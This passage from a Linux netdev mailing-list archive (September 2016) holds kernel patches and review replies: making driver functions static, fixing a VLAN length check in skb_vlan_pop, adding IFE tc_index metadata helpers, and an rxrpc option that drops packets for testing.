struct sge_uld_rxq_info *rxq_info;
@@ -273,7 +274,7 @@ int cfg_queues_uld(struct adapter *adap, unsigned int 
uld_type,
return 0;
 }
 
-void free_queues_uld(struct adapter *adap, unsigned int uld_type)
+static void free_queues_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
 
@@ -282,7 +283,8 @@ void free_queues_uld(struct adapter *adap, unsigned int 
uld_type)
kfree(rxq_info);
 }
 
-int request_msix_queue_irqs_uld(struct adapter *adap, unsigned int uld_type)
+static int
+request_msix_queue_irqs_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int idx, bmap_idx, err = 0;
@@ -307,7 +309,8 @@ unwind:
return err;
 }
 
-void free_msix_queue_irqs_uld(struct adapter *adap, unsigned int uld_type)
+static void
+free_msix_queue_irqs_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int idx;
@@ -321,7 +324,7 @@ void free_msix_queue_irqs_uld(struct adapter *adap, 
unsigned int uld_type)
}
 }
 
-void name_msix_vecs_uld(struct adapter *adap, unsigned int uld_type)
+static void name_msix_vecs_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int n = sizeof(adap->msix_info_ulds[0].desc);
@@ -361,7 +364,7 @@ static void quiesce_rx(struct adapter *adap, struct 
sge_rspq *q)
}
 }
 
-void enable_rx_uld(struct adapter *adap, unsigned int uld_type)
+static void enable_rx_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int idx;
@@ -370,7 +373,7 @@ void enable_rx_uld(struct adapter *adap, unsigned int 
uld_type)
enable_rx(adap, &rxq_info->uldrxq[idx].rspq);
 }
 
-void quiesce_rx_uld(struct adapter *adap, unsigned int uld_type)
+static void quiesce_rx_uld(struct adapter *adap, unsigned int uld_type)
 {
struct sge_uld_rxq_info *rxq_info = adap->sge.uld_rxq_info[uld_type];
int idx;
-- 
2.7.4

[PATCH] net: mvneta: mark symbols static where possible

2016-09-18 Thread Baoyou Xie

We get 2 warnings when building kernel with W=1:
drivers/net/ethernet/marvell/mvneta.c:639:27: warning: no previous prototype 
for 'mvneta_get_stats64' [-Wmissing-prototypes]
drivers/net/ethernet/marvell/mvneta.c:3529:5: warning: no previous prototype 
for 'mvneta_ethtool_set_link_ksettings' [-Wmissing-prototypes]

In fact, these functions are only used in the file in which they are
declared and don't need a declaration, so they can be made static.
This patch marks these functions as 'static'.

Signed-off-by: Baoyou Xie 
---
 drivers/net/ethernet/marvell/mvneta.c | 10 ++
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/drivers/net/ethernet/marvell/mvneta.c b/drivers/net/ethernet/marvell/mvneta.c
index 32f0cc4..03be592 100644
--- a/drivers/net/ethernet/marvell/mvneta.c
+++ b/drivers/net/ethernet/marvell/mvneta.c
@@ -636,8 +636,9 @@ static void mvneta_mib_counters_clear(struct mvneta_port 
*pp)
 }
 
 /* Get System Network Statistics */
-struct rtnl_link_stats64 *mvneta_get_stats64(struct net_device *dev,
-struct rtnl_link_stats64 *stats)
+static struct
+rtnl_link_stats64 *mvneta_get_stats64(struct net_device *dev,
+ struct rtnl_link_stats64 *stats)
 {
struct mvneta_port *pp = netdev_priv(dev);
unsigned int start;
@@ -3526,8 +3527,9 @@ static int mvneta_ioctl(struct net_device *dev, struct 
ifreq *ifr, int cmd)
 /* Ethtool methods */
 
 /* Set link ksettings (phy address, speed) for ethtools */
-int mvneta_ethtool_set_link_ksettings(struct net_device *ndev,
- const struct ethtool_link_ksettings *cmd)
+static int
+mvneta_ethtool_set_link_ksettings(struct net_device *ndev,
+ const struct ethtool_link_ksettings *cmd)
 {
struct mvneta_port *pp = netdev_priv(ndev);
struct phy_device *phydev = ndev->phydev;
-- 
2.7.4

[PATCH] net: skbuff: Fix length validation in skb_vlan_pop()

2016-09-18 Thread Shmulik Ladkani

In 93515d53b1
  "net: move vlan pop/push functions into common code"
skb_vlan_pop was moved from its private location in openvswitch to
skbuff common code.

In case !vlan_tx_tag_present, the original 'pop_vlan()' assured
that skb->len is sufficient for the existence of a vlan_ethhdr
(if skb->len < VLAN_ETH_HLEN then pop was a no-op).

This validation was moved as is into the new common 'skb_vlan_pop'.

Alas, in its original location (openvswitch), there's a guarantee that
'data' points to the mac_header, therefore the 'skb->len < VLAN_ETH_HLEN'
condition made sense.
However there's no such guarantee in the generic 'skb_vlan_pop'.

For short packets received in rx path going through 'skb_vlan_pop',
this causes 'skb_vlan_pop' to fail pop-ing a valid vlan hdr (in case tag
is in payload), or to fail moving next tag into hw-accel tag.

Instead, verify that 'skb->mac_len' is sufficient.

Signed-off-by: Shmulik Ladkani 
---
 Spotted by code review while doing work augmenting tc act vlan.

 net/core/skbuff.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index 1e329d4112..cc2c004838 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -4537,7 +4537,7 @@ int skb_vlan_pop(struct sk_buff *skb)
} else {
if (unlikely((skb->protocol != htons(ETH_P_8021Q) &&
  skb->protocol != htons(ETH_P_8021AD)) ||
-skb->len < VLAN_ETH_HLEN))
+skb->mac_len < VLAN_ETH_HLEN))
return 0;
 
err = __skb_vlan_pop(skb, &vlan_tci);
@@ -4547,7 +4547,7 @@ int skb_vlan_pop(struct sk_buff *skb)
/* move next vlan tag to hw accel tag */
if (likely((skb->protocol != htons(ETH_P_8021Q) &&
skb->protocol != htons(ETH_P_8021AD)) ||
-  skb->len < VLAN_ETH_HLEN))
+  skb->mac_len < VLAN_ETH_HLEN))
return 0;
 
vlan_proto = skb->protocol;
-- 
2.7.4
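
The difference between the two length checks can be shown with a small model. This is a sketch under stated assumptions, not kernel code: `struct demo_skb` is a hypothetical stand-in holding only the two fields compared in the patch, and the `mac_len` value used in the example is assumed to already cover the Ethernet header plus one VLAN tag, as the commit message expects. What `mac_len` actually holds in a given receive path is not established by this posting.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* 14-byte Ethernet header plus one 4-byte VLAN tag. */
#define DEMO_VLAN_ETH_HLEN 18

/* Hypothetical stand-in for the two sk_buff fields the patch compares. */
struct demo_skb {
	unsigned int len;     /* bytes from 'data' to the end of the packet */
	unsigned int mac_len; /* length of the link-layer header */
};

/* Pre-patch condition: only meaningful when 'data' is at the MAC header. */
static bool demo_old_check_allows_pop(const struct demo_skb *skb)
{
	assert(skb != NULL);
	return skb->len >= DEMO_VLAN_ETH_HLEN;
}

/* Post-patch condition: looks at the header length instead. */
static bool demo_new_check_allows_pop(const struct demo_skb *skb)
{
	assert(skb != NULL);
	return skb->mac_len >= DEMO_VLAN_ETH_HLEN;
}
```

For a short packet whose `data` has already moved past the MAC header (say 10 bytes remaining, with an assumed `mac_len` of 18), the old check turns the pop into a no-op while the new check lets it proceed.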

RE: [PATCH net-next 2/2] bnx2x: allocate mac filtering pending list in PAGE_SIZE increments

2016-09-18 Thread Mintz, Yuval

> Currently, we can have high order page allocations that specify
> GFP_ATOMIC when configuring multicast MAC address filters.
> 
> For example, we have seen order 2 page allocation failures with
> ~500 multicast addresses configured.
> 
> Convert the allocation for the pending list to be done in PAGE_SIZE
> increments.
> 
> Signed-off-by: Jason Baron 

While I appreciate the effort, I wonder whether it's worth it:

- The hardware [even in its newer generation] provides an
approximation-based classification [i.e., hashed] with 256 bins.
When configuring 500 multicast addresses, one can argue the
difference between multicast-promisc mode and actual configuration
is insignificant.
Perhaps the easier-to-maintain alternative would simply be to
determine the maximal number of multicast addresses that can be
configured using a single page, and if more than that are needed,
simply move into multicast-promisc.

- While GFP_ATOMIC is required in this flow because it's being
called from a non-sleepable context, I do believe this is mostly a remnant -
it's possible that by slightly changing the locking scheme we can have
the configuration done from a sleepable context and simply switch to
GFP_KERNEL instead.

Regarding the patch itself, the only comment I have:
> + elem_group = (struct bnx2x_mcast_elem_group *)
> +  elem_group->mcast_group_link.next;
Let's use list_next_entry() instead.
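
For readers following along, here is a minimal userspace sketch of what list_next_entry() does. The list_head, container_of, list_entry and list_next_entry definitions below are simplified stand-ins written for this example, and struct demo_elem_group and the demo_* helpers are hypothetical names, not the bnx2x ones. The point it tries to show is that the macro recovers the containing structure from the embedded link via its offset, whereas a plain cast of the link's next pointer is only valid when the link is the first member.

```c
#include <stddef.h>

/* Userspace stand-ins for the kernel's <linux/list.h> helpers. */
struct list_head {
	struct list_head *next, *prev;
};

#define container_of(ptr, type, member) \
	((type *)((char *)(ptr) - offsetof(type, member)))
#define list_entry(ptr, type, member) container_of(ptr, type, member)
#define list_next_entry(pos, member) \
	list_entry((pos)->member.next, __typeof__(*(pos)), member)

/* Hypothetical element group; the link is deliberately not the first member. */
struct demo_elem_group {
	int id;
	struct list_head link;
};

/* Append node at the tail of the circular list anchored at head. */
static void demo_list_add_tail(struct list_head *node, struct list_head *head)
{
	node->prev = head->prev;
	node->next = head;
	head->prev->next = node;
	head->prev = node;
}

/* Build head -> a -> b and return the id of the entry that follows a. */
static int demo_next_id(void)
{
	struct list_head head = { &head, &head };
	struct demo_elem_group a = { .id = 1 }, b = { .id = 2 };

	demo_list_add_tail(&a.link, &head);
	demo_list_add_tail(&b.link, &head);

	return list_next_entry(&a, link)->id;
}
```

Because link sits after id in this sketch, casting a.link.next straight to a struct demo_elem_group pointer would point four bytes (on typical ABIs, eight with padding) into b rather than at its start; the macro avoids depending on member order.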

Re: [PATCH] net/mlx5: clean function declarations in eswitch.c up

2016-09-18 Thread Leon Romanovsky

On Sun, Sep 18, 2016 at 04:44:22PM +0800, Baoyou Xie wrote:
> We get 2 warnings when building kernel with W=1:
> drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c:463:5: warning: no 
> previous prototype for 'esw_offloads_init' [-Wmissing-prototypes]
> drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c:521:6: warning: no 
> previous prototype for 'esw_offloads_cleanup' [-Wmissing-prototypes]
>
> In fact, both functions are declared in
> drivers/net/ethernet/mellanox/mlx5/core/eswitch.c, but should be
> declared in a header file so that they are visible to other files.
>
> So this patch moves the declarations into
> drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
>
> Signed-off-by: Baoyou Xie 

Thanks,
Acked-by: Leon Romanovsky 



[PATCH v2 net-next 2/2] net sched ife action: Introduce skb tcindex metadata encap decap

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

Sample use case of how this is encoded:
user space via tuntap (or a connected VM/Machine/container)
encodes the tcindex TLV.

Sample use case of decoding:
IFE action decodes it and the skb->tc_index is then used to classify.
So something like this for encoded ICMP packets:

.. first decode then reclassify... skb->tc_index will be set
sudo $TC filter add dev $ETH parent : prio 2 protocol 0xbeef \
u32 match u32 0 0 flowid 1:1 \
action ife decode reclassify

...next match the decoded icmp packet...
sudo $TC filter add dev $ETH parent : prio 4 protocol ip \
u32 match ip protocol 1 0xff flowid 1:1 \
action continue

... last classify it using the tcindex classifier and do some action..
sudo $TC filter add dev $ETH parent : prio 5 protocol ip \
handle 0x11 tcindex classid 1:1 \
action blah..

Signed-off-by: Jamal Hadi Salim 
---
 include/uapi/linux/tc_act/tc_ife.h | 3 ++-
 net/sched/Kconfig  | 5 +
 net/sched/Makefile | 1 +
 3 files changed, 8 insertions(+), 1 deletion(-)

diff --git a/include/uapi/linux/tc_act/tc_ife.h 
b/include/uapi/linux/tc_act/tc_ife.h
index 4ece02a..cd18360 100644
--- a/include/uapi/linux/tc_act/tc_ife.h
+++ b/include/uapi/linux/tc_act/tc_ife.h
@@ -32,8 +32,9 @@ enum {
 #define IFE_META_HASHID 2
 #defineIFE_META_PRIO 3
 #defineIFE_META_QMAP 4
+#defineIFE_META_TCINDEX 5
 /*Can be overridden at runtime by module option*/
-#define__IFE_META_MAX 5
+#define__IFE_META_MAX 6
 #define IFE_META_MAX (__IFE_META_MAX - 1)
 
 #endif
diff --git a/net/sched/Kconfig b/net/sched/Kconfig
index 7795d5a..87956a7 100644
--- a/net/sched/Kconfig
+++ b/net/sched/Kconfig
@@ -793,6 +793,11 @@ config NET_IFE_SKBPRIO
 depends on NET_ACT_IFE
 ---help---
 
+config NET_IFE_SKBTCINDEX
+tristate "Support to encoding decoding skb tcindex on IFE action"
+depends on NET_ACT_IFE
+---help---
+
 config NET_CLS_IND
bool "Incoming device classification"
depends on NET_CLS_U32 || NET_CLS_FW
diff --git a/net/sched/Makefile b/net/sched/Makefile
index 148ae0d..4bdda36 100644
--- a/net/sched/Makefile
+++ b/net/sched/Makefile
@@ -23,6 +23,7 @@ obj-$(CONFIG_NET_ACT_SKBMOD)  += act_skbmod.o
 obj-$(CONFIG_NET_ACT_IFE)  += act_ife.o
 obj-$(CONFIG_NET_IFE_SKBMARK)  += act_meta_mark.o
 obj-$(CONFIG_NET_IFE_SKBPRIO)  += act_meta_skbprio.o
+obj-$(CONFIG_NET_IFE_SKBTCINDEX)   += act_meta_skbtcindex.o
 obj-$(CONFIG_NET_ACT_TUNNEL_KEY)+= act_tunnel_key.o
 obj-$(CONFIG_NET_SCH_FIFO) += sch_fifo.o
 obj-$(CONFIG_NET_SCH_CBQ)  += sch_cbq.o
-- 
1.9.1

[PATCH v2 net-next 1/2] net sched ife action: add 16 bit helpers

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

encoder and checker for 16 bits metadata

Signed-off-by: Jamal Hadi Salim 
---
 include/net/tc_act/tc_ife.h |  2 ++
 net/sched/act_ife.c | 26 ++
 2 files changed, 28 insertions(+)

diff --git a/include/net/tc_act/tc_ife.h b/include/net/tc_act/tc_ife.h
index 5164bd7..9fd2bea0 100644
--- a/include/net/tc_act/tc_ife.h
+++ b/include/net/tc_act/tc_ife.h
@@ -50,9 +50,11 @@ int ife_tlv_meta_encode(void *skbdata, u16 attrtype, u16 
dlen,
 int ife_alloc_meta_u32(struct tcf_meta_info *mi, void *metaval, gfp_t gfp);
 int ife_alloc_meta_u16(struct tcf_meta_info *mi, void *metaval, gfp_t gfp);
 int ife_check_meta_u32(u32 metaval, struct tcf_meta_info *mi);
+int ife_check_meta_u16(u16 metaval, struct tcf_meta_info *mi);
 int ife_encode_meta_u32(u32 metaval, void *skbdata, struct tcf_meta_info *mi);
 int ife_validate_meta_u32(void *val, int len);
 int ife_validate_meta_u16(void *val, int len);
+int ife_encode_meta_u16(u16 metaval, void *skbdata, struct tcf_meta_info *mi);
 void ife_release_meta_gen(struct tcf_meta_info *mi);
 int register_ife_op(struct tcf_meta_ops *mops);
 int unregister_ife_op(struct tcf_meta_ops *mops);
diff --git a/net/sched/act_ife.c b/net/sched/act_ife.c
index e87cd81..ccf7b4b 100644
--- a/net/sched/act_ife.c
+++ b/net/sched/act_ife.c
@@ -63,6 +63,23 @@ int ife_tlv_meta_encode(void *skbdata, u16 attrtype, u16 
dlen, const void *dval)
 }
 EXPORT_SYMBOL_GPL(ife_tlv_meta_encode);
 
+int ife_encode_meta_u16(u16 metaval, void *skbdata, struct tcf_meta_info *mi)
+{
+   u16 edata = 0;
+
+   if (mi->metaval)
+   edata = *(u16 *)mi->metaval;
+   else if (metaval)
+   edata = metaval;
+
+   if (!edata) /* will not encode */
+   return 0;
+
+   edata = htons(edata);
+   return ife_tlv_meta_encode(skbdata, mi->metaid, 2, &edata);
+}
+EXPORT_SYMBOL_GPL(ife_encode_meta_u16);
+
 int ife_get_meta_u32(struct sk_buff *skb, struct tcf_meta_info *mi)
 {
if (mi->metaval)
@@ -81,6 +98,15 @@ int ife_check_meta_u32(u32 metaval, struct tcf_meta_info *mi)
 }
 EXPORT_SYMBOL_GPL(ife_check_meta_u32);
 
+int ife_check_meta_u16(u16 metaval, struct tcf_meta_info *mi)
+{
+   if (metaval || mi->metaval)
+   return 8; /* T+L+(V) == 2+2+(2+2bytepad) */
+
+   return 0;
+}
+EXPORT_SYMBOL_GPL(ife_check_meta_u16);
+
 int ife_encode_meta_u32(u32 metaval, void *skbdata, struct tcf_meta_info *mi)
 {
u32 edata = metaval;
-- 
1.9.1

Re: [PATCH net-next 00/14] rxrpc: Fixes & miscellany

2016-09-18 Thread David Miller


David, could you please stop submitting two sets of series at
the same time?

I want people to have a single, reasonably sized, patch series
in flight at one time for a given subsystem/driver/whatever.

But if you send both a 14 and an 11 patch series at the same
time, that defeats this entirely.

Thank you.

Re: [PATCH v2 net-next 1/2] net sched ife action: add 16 bit helpers

2016-09-18 Thread Jamal Hadi Salim


Sorry something missing - will send v3.

cheers,
jamal

On 16-09-18 07:21 AM, Jamal Hadi Salim wrote:

From: Jamal Hadi Salim 

encoder and checker for 16 bits metadata

[PATCH v3 net-next 1/2] net sched ife action: add 16 bit helpers

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

encoder and checker for 16 bits metadata

Signed-off-by: Jamal Hadi Salim 
---
 include/net/tc_act/tc_ife.h |  2 ++
 net/sched/act_ife.c | 26 ++
 2 files changed, 28 insertions(+)

diff --git a/include/net/tc_act/tc_ife.h b/include/net/tc_act/tc_ife.h
index 5164bd7..9fd2bea0 100644
--- a/include/net/tc_act/tc_ife.h
+++ b/include/net/tc_act/tc_ife.h
@@ -50,9 +50,11 @@ int ife_tlv_meta_encode(void *skbdata, u16 attrtype, u16 
dlen,
 int ife_alloc_meta_u32(struct tcf_meta_info *mi, void *metaval, gfp_t gfp);
 int ife_alloc_meta_u16(struct tcf_meta_info *mi, void *metaval, gfp_t gfp);
 int ife_check_meta_u32(u32 metaval, struct tcf_meta_info *mi);
+int ife_check_meta_u16(u16 metaval, struct tcf_meta_info *mi);
 int ife_encode_meta_u32(u32 metaval, void *skbdata, struct tcf_meta_info *mi);
 int ife_validate_meta_u32(void *val, int len);
 int ife_validate_meta_u16(void *val, int len);
+int ife_encode_meta_u16(u16 metaval, void *skbdata, struct tcf_meta_info *mi);
 void ife_release_meta_gen(struct tcf_meta_info *mi);
 int register_ife_op(struct tcf_meta_ops *mops);
 int unregister_ife_op(struct tcf_meta_ops *mops);
diff --git a/net/sched/act_ife.c b/net/sched/act_ife.c
index e87cd81..ccf7b4b 100644
--- a/net/sched/act_ife.c
+++ b/net/sched/act_ife.c
@@ -63,6 +63,23 @@ int ife_tlv_meta_encode(void *skbdata, u16 attrtype, u16 
dlen, const void *dval)
 }
 EXPORT_SYMBOL_GPL(ife_tlv_meta_encode);
 
+int ife_encode_meta_u16(u16 metaval, void *skbdata, struct tcf_meta_info *mi)
+{
+   u16 edata = 0;
+
+   if (mi->metaval)
+   edata = *(u16 *)mi->metaval;
+   else if (metaval)
+   edata = metaval;
+
+   if (!edata) /* will not encode */
+   return 0;
+
+   edata = htons(edata);
+   return ife_tlv_meta_encode(skbdata, mi->metaid, 2, &edata);
+}
+EXPORT_SYMBOL_GPL(ife_encode_meta_u16);
+
 int ife_get_meta_u32(struct sk_buff *skb, struct tcf_meta_info *mi)
 {
if (mi->metaval)
@@ -81,6 +98,15 @@ int ife_check_meta_u32(u32 metaval, struct tcf_meta_info *mi)
 }
 EXPORT_SYMBOL_GPL(ife_check_meta_u32);
 
+int ife_check_meta_u16(u16 metaval, struct tcf_meta_info *mi)
+{
+   if (metaval || mi->metaval)
+   return 8; /* T+L+(V) == 2+2+(2+2bytepad) */
+
+   return 0;
+}
+EXPORT_SYMBOL_GPL(ife_check_meta_u16);
+
 int ife_encode_meta_u32(u32 metaval, void *skbdata, struct tcf_meta_info *mi)
 {
u32 edata = metaval;
-- 
1.9.1
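
As a reading aid for the "T+L+(V) == 2+2+(2+2bytepad)" comment in ife_check_meta_u16(), the following is a rough userspace sketch of how a 16-bit value ends up occupying 8 bytes. All demo_* and DEMO_* names are hypothetical, and the layout (2-byte type, 2-byte length covering header plus value, value padded to a 4-byte boundary, everything in network byte order) is an assumption inferred from that comment and from the call to ife_tlv_meta_encode() with a length of 2; it is not a copy of the kernel helper.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>

#define DEMO_TLV_HDRLEN 4u			/* 2-byte type + 2-byte length */
#define DEMO_TLV_ALIGN(len) (((len) + 3u) & ~3u)

/*
 * Write one TLV into buf and return the padded size.
 * buf must have room for DEMO_TLV_ALIGN(DEMO_TLV_HDRLEN + dlen) bytes.
 */
static unsigned int demo_tlv_encode(uint8_t *buf, uint16_t type,
				    const void *val, uint16_t dlen)
{
	unsigned int total = DEMO_TLV_ALIGN(DEMO_TLV_HDRLEN + dlen);
	uint16_t t = htons(type);
	uint16_t l = htons((uint16_t)(DEMO_TLV_HDRLEN + dlen));

	memset(buf, 0, total);		/* zero the pad bytes too */
	memcpy(buf, &t, 2);
	memcpy(buf + 2, &l, 2);
	memcpy(buf + DEMO_TLV_HDRLEN, val, dlen);
	return total;
}

/* Encode a 16-bit value in network byte order and return the TLV size. */
static unsigned int demo_encode_u16(uint8_t *buf, uint16_t type, uint16_t v)
{
	uint16_t be = htons(v);

	return demo_tlv_encode(buf, type, &be, sizeof(be));
}
```

With an 8-byte buffer, demo_encode_u16(buf, 5, 0x11) fills the bytes 00 05 00 06 00 11 00 00 and returns 8, which matches the size the checker reports when the metadatum is present.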

[PATCH v3 net-next 2/2] net sched ife action: Introduce skb tcindex metadata encap decap

2016-09-18 Thread Jamal Hadi Salim

From: Jamal Hadi Salim 

Sample use case of how this is encoded:
user space via tuntap (or a connected VM/Machine/container)
encodes the tcindex TLV.

Sample use case of decoding:
IFE action decodes it and the skb->tc_index is then used to classify.
So something like this for encoded ICMP packets:

.. first decode then reclassify... skb->tc_index will be set
sudo $TC filter add dev $ETH parent : prio 2 protocol 0xbeef \
u32 match u32 0 0 flowid 1:1 \
action ife decode reclassify

...next match the decoded icmp packet...
sudo $TC filter add dev $ETH parent : prio 4 protocol ip \
u32 match ip protocol 1 0xff flowid 1:1 \
action continue

... last classify it using the tcindex classifier and do some action..
sudo $TC filter add dev $ETH parent : prio 5 protocol ip \
handle 0x11 tcindex classid 1:1 \
action blah..

Signed-off-by: Jamal Hadi Salim 
---
 include/uapi/linux/tc_act/tc_ife.h |  3 +-
 net/sched/Kconfig  |  5 +++
 net/sched/Makefile |  1 +
 net/sched/act_meta_skbtcindex.c| 79 ++
 4 files changed, 87 insertions(+), 1 deletion(-)
 create mode 100644 net/sched/act_meta_skbtcindex.c

diff --git a/include/uapi/linux/tc_act/tc_ife.h 
b/include/uapi/linux/tc_act/tc_ife.h
index 4ece02a..cd18360 100644
--- a/include/uapi/linux/tc_act/tc_ife.h
+++ b/include/uapi/linux/tc_act/tc_ife.h
@@ -32,8 +32,9 @@ enum {
 #define IFE_META_HASHID 2
 #defineIFE_META_PRIO 3
 #defineIFE_META_QMAP 4
+#defineIFE_META_TCINDEX 5
 /*Can be overridden at runtime by module option*/
-#define__IFE_META_MAX 5
+#define__IFE_META_MAX 6
 #define IFE_META_MAX (__IFE_META_MAX - 1)
 
 #endif
diff --git a/net/sched/Kconfig b/net/sched/Kconfig
index 7795d5a..87956a7 100644
--- a/net/sched/Kconfig
+++ b/net/sched/Kconfig
@@ -793,6 +793,11 @@ config NET_IFE_SKBPRIO
 depends on NET_ACT_IFE
 ---help---
 
+config NET_IFE_SKBTCINDEX
+tristate "Support to encoding decoding skb tcindex on IFE action"
+depends on NET_ACT_IFE
+---help---
+
 config NET_CLS_IND
bool "Incoming device classification"
depends on NET_CLS_U32 || NET_CLS_FW
diff --git a/net/sched/Makefile b/net/sched/Makefile
index 148ae0d..4bdda36 100644
--- a/net/sched/Makefile
+++ b/net/sched/Makefile
@@ -23,6 +23,7 @@ obj-$(CONFIG_NET_ACT_SKBMOD)  += act_skbmod.o
 obj-$(CONFIG_NET_ACT_IFE)  += act_ife.o
 obj-$(CONFIG_NET_IFE_SKBMARK)  += act_meta_mark.o
 obj-$(CONFIG_NET_IFE_SKBPRIO)  += act_meta_skbprio.o
+obj-$(CONFIG_NET_IFE_SKBTCINDEX)   += act_meta_skbtcindex.o
 obj-$(CONFIG_NET_ACT_TUNNEL_KEY)+= act_tunnel_key.o
 obj-$(CONFIG_NET_SCH_FIFO) += sch_fifo.o
 obj-$(CONFIG_NET_SCH_CBQ)  += sch_cbq.o
diff --git a/net/sched/act_meta_skbtcindex.c b/net/sched/act_meta_skbtcindex.c
new file mode 100644
index 000..3b35774
--- /dev/null
+++ b/net/sched/act_meta_skbtcindex.c
@@ -0,0 +1,79 @@
+/*
+ * net/sched/act_meta_tc_index.c IFE skb->tc_index metadata module
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU General Public License
+ * as published by the Free Software Foundation; either version
+ * 2 of the License, or (at your option) any later version.
+ *
+ * copyright Jamal Hadi Salim (2016)
+ *
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+static int skbtcindex_encode(struct sk_buff *skb, void *skbdata,
+struct tcf_meta_info *e)
+{
+   u32 ifetc_index = skb->tc_index;
+
+   return ife_encode_meta_u16(ifetc_index, skbdata, e);
+}
+
+static int skbtcindex_decode(struct sk_buff *skb, void *data, u16 len)
+{
+   u16 ifetc_index = *(u16 *)data;
+
+   skb->tc_index = ntohs(ifetc_index);
+   return 0;
+}
+
+static int skbtcindex_check(struct sk_buff *skb, struct tcf_meta_info *e)
+{
+   return ife_check_meta_u16(skb->tc_index, e);
+}
+
+static struct tcf_meta_ops ife_skbtcindex_ops = {
+   .metaid = IFE_META_TCINDEX,
+   .metatype = NLA_U16,
+   .name = "tc_index",
+   .synopsis = "skb tc_index 16 bit metadata",
+   .check_presence = skbtcindex_check,
+   .encode = skbtcindex_encode,
+   .decode = skbtcindex_decode,
+   .get = ife_get_meta_u16,
+   .alloc = ife_alloc_meta_u16,
+   .release = ife_release_meta_gen,
+   .validate = ife_validate_meta_u16,
+   .owner = THIS_MODULE,
+};
+
+static int __init ifetc_index_init_module(void)
+{
+   return register_ife_op(&ife_skbtcindex_ops);
+}
+
+static void __exit ifetc_index_cleanup_module(void)
+{
+   unregister_ife_op(&ife_skbtcindex_ops);
+}
+
+module_init(ifetc_index_init_module);
+module_exit(ifetc_index_cleanup_module);
+
+MODULE_AUTHOR("Jamal Hadi Salim(2016)");
+MODULE_DESCRIPTION("Inter-FE skb tc_index metadata module");
+MODULE_LICENSE

Re: [PATCH] net: mvneta: mark symbols static where possible

2016-09-18 Thread Thomas Petazzoni

Hello,

On Sun, 18 Sep 2016 17:20:45 +0800, Baoyou Xie wrote:
> We get 2 warnings when building kernel with W=1:
> drivers/net/ethernet/marvell/mvneta.c:639:27: warning: no previous prototype 
> for 'mvneta_get_stats64' [-Wmissing-prototypes]
> drivers/net/ethernet/marvell/mvneta.c:3529:5: warning: no previous prototype 
> for 'mvneta_ethtool_set_link_ksettings' [-Wmissing-prototypes]
> 
> In fact, these functions are only used in the file in which they are
> declared and don't need a declaration, but can be made static.
> so this patch marks these functions with 'static'.
> 
> Signed-off-by: Baoyou Xie 

Acked-by: Thomas Petazzoni 

-- 
Thomas Petazzoni, CTO, Free Electrons
Embedded Linux and Kernel engineering
http://free-electrons.com

Re: [PATCH net-next 11/11] rxrpc: Add config to inject packet loss

2016-09-18 Thread Sergei Shtylyov


Hello.

On 9/18/2016 2:22 AM, David Howells wrote:


Add a configuration option to inject packet loss by discarding
approximately every 8th packet received and approximately every 8th DATA
packet transmitted.

Note that no locking is used, but it shouldn't really matter.

Signed-off-by: David Howells 


[...]


diff --git a/net/rxrpc/input.c b/net/rxrpc/input.c
index 84bb16d47b85..7ac1edf3aac7 100644
--- a/net/rxrpc/input.c
+++ b/net/rxrpc/input.c
@@ -712,6 +712,14 @@ void rxrpc_data_ready(struct sock *udp_sk)
skb_orphan(skb);
sp = rxrpc_skb(skb);

+   if (IS_ENABLED(CONFIG_AF_RXRPC_INJECT_LOSS)) {
+   static int lose;


   IIRC, scripts/checkpatch.pl complains now if there's no empty line after 
declaration...



+   if ((lose++ & 7) == 7) {
+   rxrpc_lose_skb(skb, rxrpc_skb_rx_lost);
+   return;
+   }
+   }
+
_net("Rx UDP packet from %08x:%04hu",
 ntohl(ip_hdr(skb)->saddr), ntohs(udp_hdr(skb)->source));

diff --git a/net/rxrpc/output.c b/net/rxrpc/output.c
index a2cad5ce7416..16e18a94ffa6 100644
--- a/net/rxrpc/output.c
+++ b/net/rxrpc/output.c
@@ -225,6 +225,15 @@ int rxrpc_send_data_packet(struct rxrpc_connection *conn, 
struct sk_buff *skb)
msg.msg_controllen = 0;
msg.msg_flags = 0;

+   if (IS_ENABLED(CONFIG_AF_RXRPC_INJECT_LOSS)) {
+   static int lose;


   Same here.


+   if ((lose++ & 7) == 7) {
+   rxrpc_lose_skb(skb, rxrpc_skb_tx_lost);
+   _leave(" = 0 [lose]");
+   return 0;
+   }
+   }
+
/* send the packet with the don't fragment bit set if we currently
 * think it's small enough */
if (skb->len - sizeof(struct rxrpc_wire_header) < 
conn->params.peer->maxdata) {


MBR, Sergei
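
For reference, the "(lose++ & 7) == 7" test in the quoted hunks can be exercised in isolation with a small userspace sketch. The demo_* names are hypothetical, and the counter is unsigned here (the patch uses a plain int) so that wrap-around is well defined in standalone C.

```c
#include <stdbool.h>

/*
 * Return true for every 8th call. The counter is static and unlocked,
 * like the one in the patch, so concurrent callers may skew the ratio.
 */
static bool demo_should_lose(void)
{
	static unsigned int lose;

	return (lose++ & 7) == 7;
}

/* Count how many of n consecutive packets would be discarded. */
static int demo_count_lost(int n)
{
	int i, lost = 0;

	for (i = 0; i < n; i++)
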